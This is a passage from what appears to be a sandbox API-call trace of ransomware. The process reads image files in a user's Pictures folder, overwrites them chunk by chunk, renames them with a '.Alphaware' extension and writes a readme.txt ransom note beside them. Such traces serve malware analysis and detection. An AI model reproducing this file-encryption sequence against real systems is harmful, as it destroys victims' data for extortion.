(lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\E1l_XrQ6aMcGTT.bmp", dwFileAttributes=0x80) returned 1 [0085.830] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8b8) returned 1 [0085.830] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\E1l_XrQ6aMcGTT.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\e1l_xrq6amcgtt.bmp"), fInfoLevelId=0x0, lpFileInformation=0x25984a8 | out: lpFileInformation=0x25984a8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x9153ab40, ftCreationTime.dwHighDateTime=0x1d96e7c, ftLastAccessTime.dwLowDateTime=0xfba38500, ftLastAccessTime.dwHighDateTime=0x1d9722e, ftLastWriteTime.dwLowDateTime=0xfba38500, ftLastWriteTime.dwHighDateTime=0x1d9722e, nFileSizeHigh=0x0, nFileSizeLow=0xdc32)) returned 1 [0085.830] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e868) returned 1 [0085.830] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e948) returned 1 [0085.831] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\E1l_XrQ6aMcGTT.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\e1l_xrq6amcgtt.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0085.831] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8b8) returned 1 [0085.831] ReadFile (in: hFile=0x254, lpBuffer=0x2598740, nNumberOfBytesToRead=0xdc32, lpNumberOfBytesRead=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x2598740*, lpNumberOfBytesRead=0x23e9f8*=0xdc32, lpOverlapped=0x0) returned 1 [0085.892] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e878) returned 1 [0085.892] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\E1l_XrQ6aMcGTT.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\e1l_xrq6amcgtt.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0085.894] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7e8) returned 1 [0085.897] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7e8) returned 1 [0085.898] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\E1l_XrQ6aMcGTT.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\e1l_xrq6amcgtt.bmp"), fInfoLevelId=0x0, lpFileInformation=0x23eb10 | out: lpFileInformation=0x23eb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9153ab40, ftCreationTime.dwHighDateTime=0x1d96e7c, ftLastAccessTime.dwLowDateTime=0xfba38500, ftLastAccessTime.dwHighDateTime=0x1d9722e, ftLastWriteTime.dwLowDateTime=0x85669400, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x12674)) returned 1 [0085.898] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e798) returned 1 [0085.898] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\E1l_XrQ6aMcGTT.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\e1l_xrq6amcgtt.bmp"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\E1l_XrQ6aMcGTT.bmp.Alphaware" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\e1l_xrq6amcgtt.bmp.alphaware")) returned 1 [0085.899] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e908) returned 1 [0085.899] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\readme.txt" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0085.899] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e878) returned 1 [0085.901] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\mlVaW3l8E0FMzi-R4q.gif", dwFileAttributes=0x80) returned 1 [0085.902] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8b8) returned 1 [0085.902] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\mlVaW3l8E0FMzi-R4q.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\mlvaw3l8e0fmzi-r4q.gif"), fInfoLevelId=0x0, lpFileInformation=0x26512c8 | out: lpFileInformation=0x26512c8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe481aa50, ftCreationTime.dwHighDateTime=0x1d9720b, ftLastAccessTime.dwLowDateTime=0x5ac001d0, ftLastAccessTime.dwHighDateTime=0x1d97324, ftLastWriteTime.dwLowDateTime=0x5ac001d0, ftLastWriteTime.dwHighDateTime=0x1d97324, nFileSizeHigh=0x0, nFileSizeLow=0x14c56)) returned 1 [0085.902] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e868) returned 1 [0085.902] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e948) returned 1 [0085.902] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\mlVaW3l8E0FMzi-R4q.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\mlvaw3l8e0fmzi-r4q.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0085.902] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8b8) returned 1 [0085.902] ReadFile (in: hFile=0x254, lpBuffer=0x12a87a98, nNumberOfBytesToRead=0x14c56, lpNumberOfBytesRead=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x12a87a98*, lpNumberOfBytesRead=0x23e9f8*=0x14c56, lpOverlapped=0x0) returned 1 [0085.959] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\mlVaW3l8E0FMzi-R4q.gif", nBufferLength=0x105, lpBuffer=0x23e360, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\mlVaW3l8E0FMzi-R4q.gif", lpFilePart=0x0) returned 0x43 [0085.959] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e878) returned 1 [0085.960] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\mlVaW3l8E0FMzi-R4q.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\mlvaw3l8e0fmzi-r4q.gif"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0085.962] GetFileType (hFile=0x254) returned 0x1 [0085.962] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7e8) returned 1 [0085.962] GetFileType (hFile=0x254) returned 0x1 [0085.962] WriteFile (in: hFile=0x254, lpBuffer=0x23f0c60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x23f0c60*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0085.964] WriteFile (in: hFile=0x254, lpBuffer=0x23f0c60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x23f0c60*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0085.964] WriteFile (in: hFile=0x254, lpBuffer=0x23f0c60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x23f0c60*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0085.965] WriteFile (in: hFile=0x254, lpBuffer=0x23f0c60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x23f0c60*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0085.965] WriteFile (in: hFile=0x254, lpBuffer=0x23f0c60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x23f0c60*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0085.965] WriteFile (in: hFile=0x254, lpBuffer=0x23f0c60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x23f0c60*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0085.966] WriteFile (in: hFile=0x254, lpBuffer=0x23f0c60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x23f0c60*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0085.966] WriteFile (in: hFile=0x254, lpBuffer=0x23f0c60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x23f0c60*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0085.966] WriteFile (in: hFile=0x254, lpBuffer=0x23f0c60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x23f0c60*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0085.967] WriteFile (in: hFile=0x254, lpBuffer=0x23f0c60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x23f0c60*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0085.967] WriteFile (in: hFile=0x254, lpBuffer=0x23f0c60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x23f0c60*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0085.967] WriteFile (in: hFile=0x254, lpBuffer=0x23f0c60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x23f0c60*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0085.967] WriteFile (in: hFile=0x254, lpBuffer=0x23f0c60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x23f0c60*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0085.968] WriteFile (in: hFile=0x254, lpBuffer=0x23f0c60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x23f0c60*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0085.968] WriteFile (in: hFile=0x254, lpBuffer=0x23f0c60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x23f0c60*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0085.968] WriteFile (in: hFile=0x254, lpBuffer=0x23f0c60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x23f0c60*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0085.968] WriteFile (in: hFile=0x254, lpBuffer=0x23f0c60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x23f0c60*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0085.969] WriteFile (in: hFile=0x254, lpBuffer=0x23f0c60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x23f0c60*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0085.969] WriteFile (in: hFile=0x254, lpBuffer=0x23f0c60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x23f0c60*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0085.969] WriteFile (in: hFile=0x254, lpBuffer=0x23f0c60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x23f0c60*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0085.969] WriteFile (in: hFile=0x254, lpBuffer=0x23f0c60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x23f0c60*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0085.970] WriteFile (in: hFile=0x254, lpBuffer=0x23f0c60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x23f0c60*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0085.970] WriteFile (in: hFile=0x254, lpBuffer=0x23f0c60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x23f0c60*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0085.970] WriteFile (in: hFile=0x254, lpBuffer=0x23f0c60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x23f0c60*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0085.970] WriteFile (in: hFile=0x254, lpBuffer=0x23f0c60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x23f0c60*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0085.971] WriteFile (in: hFile=0x254, lpBuffer=0x23f0c60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x23f0c60*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0085.971] WriteFile (in: hFile=0x254, lpBuffer=0x23f0c60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x23f0c60*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0085.971] WriteFile (in: hFile=0x254, lpBuffer=0x23f0c60*, nNumberOfBytesToWrite=0xbf4, lpNumberOfBytesWritten=0x23e8b8, lpOverlapped=0x0 | out: lpBuffer=0x23f0c60*, lpNumberOfBytesWritten=0x23e8b8*=0xbf4, lpOverlapped=0x0) returned 1 [0085.971] CloseHandle (hObject=0x254) returned 1 [0085.974] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\mlVaW3l8E0FMzi-R4q.gif", nBufferLength=0x105, lpBuffer=0x23e5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\mlVaW3l8E0FMzi-R4q.gif", lpFilePart=0x0) returned 0x43 [0085.975] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\mlVaW3l8E0FMzi-R4q.gif.Alphaware", nBufferLength=0x105, lpBuffer=0x23e5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\mlVaW3l8E0FMzi-R4q.gif.Alphaware", lpFilePart=0x0) returned 0x4d [0085.975] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7e8) returned 1 [0085.975] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\mlVaW3l8E0FMzi-R4q.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\mlvaw3l8e0fmzi-r4q.gif"), fInfoLevelId=0x0, lpFileInformation=0x23eb10 | out: lpFileInformation=0x23eb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe481aa50, ftCreationTime.dwHighDateTime=0x1d9720b, ftLastAccessTime.dwLowDateTime=0x5ac001d0, ftLastAccessTime.dwHighDateTime=0x1d97324, ftLastWriteTime.dwLowDateTime=0x85701980, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1bbf4)) returned 1 [0085.975] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e798) returned 1 [0085.975] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\mlVaW3l8E0FMzi-R4q.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\mlvaw3l8e0fmzi-r4q.gif"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\mlVaW3l8E0FMzi-R4q.gif.Alphaware" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\mlvaw3l8e0fmzi-r4q.gif.alphaware")) returned 1 [0085.982] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\V8U50BNOH.bmp", nBufferLength=0x105, lpBuffer=0x23e660, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\V8U50BNOH.bmp", lpFilePart=0x0) returned 0x3a [0085.982] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\V8U50BNOH.bmp", dwFileAttributes=0x80) returned 1 [0085.983] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8b8) returned 1 [0085.983] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\V8U50BNOH.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\v8u50bnoh.bmp"), fInfoLevelId=0x0, lpFileInformation=0x23f2610 | out: lpFileInformation=0x23f2610*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x52d2c890, ftCreationTime.dwHighDateTime=0x1d970fe, ftLastAccessTime.dwLowDateTime=0x81ba1820, ftLastAccessTime.dwHighDateTime=0x1d9711c, ftLastWriteTime.dwLowDateTime=0x81ba1820, ftLastWriteTime.dwHighDateTime=0x1d9711c, nFileSizeHigh=0x0, nFileSizeLow=0x17c7b)) returned 1 [0085.983] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e868) returned 1 [0085.983] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\V8U50BNOH.bmp", nBufferLength=0x105, lpBuffer=0x23e430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\V8U50BNOH.bmp", lpFilePart=0x0) returned 0x3a [0085.983] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e948) returned 1 [0085.983] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\V8U50BNOH.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\v8u50bnoh.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0085.983] GetFileType (hFile=0x254) returned 0x1 [0085.983] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8b8) returned 1 [0085.983] GetFileType (hFile=0x254) returned 0x1 [0085.984] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23eac8 | out: lpFileSizeHigh=0x23eac8*=0x0) returned 0x17c7b [0085.984] ReadFile (in: hFile=0x254, lpBuffer=0x12ad3f50, nNumberOfBytesToRead=0x17c7b, lpNumberOfBytesRead=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x12ad3f50*, lpNumberOfBytesRead=0x23e9f8*=0x17c7b, lpOverlapped=0x0) returned 1 [0085.985] CloseHandle (hObject=0x254) returned 1 [0086.107] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e878) returned 1 [0086.107] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\V8U50BNOH.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\v8u50bnoh.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0086.108] GetFileType (hFile=0x254) returned 0x1 [0086.108] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7e8) returned 1 [0086.108] GetFileType (hFile=0x254) returned 0x1 [0086.109] WriteFile (in: hFile=0x254, lpBuffer=0x246f2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x246f2a0*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0086.110] WriteFile (in: hFile=0x254, lpBuffer=0x246f2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x246f2a0*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0086.110] WriteFile (in: hFile=0x254, lpBuffer=0x246f2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x246f2a0*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0086.110] WriteFile (in: hFile=0x254, lpBuffer=0x246f2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x246f2a0*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0086.111] WriteFile (in: hFile=0x254, lpBuffer=0x246f2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x246f2a0*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0086.111] WriteFile (in: hFile=0x254, lpBuffer=0x246f2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x246f2a0*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0086.111] WriteFile (in: hFile=0x254, lpBuffer=0x246f2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x246f2a0*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0086.111] WriteFile (in: hFile=0x254, lpBuffer=0x246f2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x246f2a0*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0086.112] WriteFile (in: hFile=0x254, lpBuffer=0x246f2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x246f2a0*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0086.112] WriteFile (in: hFile=0x254, lpBuffer=0x246f2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x246f2a0*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0086.112] WriteFile (in: hFile=0x254, lpBuffer=0x246f2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x246f2a0*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0086.113] WriteFile (in: hFile=0x254, lpBuffer=0x246f2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x246f2a0*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0086.113] WriteFile (in: hFile=0x254, lpBuffer=0x246f2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x246f2a0*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0086.113] WriteFile (in: hFile=0x254, lpBuffer=0x246f2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x246f2a0*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0086.113] WriteFile (in: hFile=0x254, lpBuffer=0x246f2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x246f2a0*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0086.114] WriteFile (in: hFile=0x254, lpBuffer=0x246f2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x246f2a0*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0086.114] WriteFile (in: hFile=0x254, lpBuffer=0x246f2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x246f2a0*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0086.114] WriteFile (in: hFile=0x254, lpBuffer=0x246f2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x246f2a0*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0086.114] WriteFile (in: hFile=0x254, lpBuffer=0x246f2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x246f2a0*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0086.115] WriteFile (in: hFile=0x254, lpBuffer=0x246f2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x246f2a0*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0086.115] WriteFile (in: hFile=0x254, lpBuffer=0x246f2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x246f2a0*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0086.115] WriteFile (in: hFile=0x254, lpBuffer=0x246f2a0*, nNumberOfBytesToWrite=0x1000, 